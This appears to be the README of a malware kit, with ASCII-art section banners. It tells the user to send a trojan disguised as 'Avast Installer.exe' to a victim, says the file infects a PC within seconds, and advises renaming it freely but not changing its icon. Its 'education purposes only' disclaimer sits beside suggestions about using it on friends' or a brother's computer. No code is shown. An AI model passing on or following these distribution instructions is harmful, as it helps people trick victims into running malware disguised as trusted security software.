.___        _____              __  .__                .__        _____       
|   | _____/ ____\____   _____/  |_|__| ____   ____   |__| _____/ ____\____  
|   |/    \   __\/ __ \_/ ___\   __\  |/  _ \ /    \  |  |/    \   __\/  _ \ 
|   |   |  \  | \  ___/\  \___|  | |  (  <_> )   |  \ |  |   |  \  | (  <_> )
|___|___|  /__|  \___  >\___  >__| |__|\____/|___|  / |__|___|  /__|  \____/ 
         \/          \/     \/                    \/          \/             
- Send the "Avast Installer.exe" to your victim
- The file infects pc in few seconds
- You *can* rename the file to whatever you want
- Please, do not use resource hacker to change the icon of the file, cause the file can break. Thx

  _________                          .__  __          
 /   _____/ ____   ____  __ _________|__|/  |_ ___.__.
 \_____  \_/ __ \_/ ___\|  |  \_  __ \  \   __<   |  |
 /        \  ___/\  \___|  |  /|  | \/  ||  |  \___  |
/_______  /\___  >\___  >____/ |__|  |__||__|  / ____|
        \/     \/     \/                       \/     
- Don´t run this file on your pc or whoever can access it with this script.
- If u want to test it, use virtual machine
- Don´t use this to illegal purposes
- This program is only for education purposes!
- Please be carefull if u want to use it on your friends or brother computer.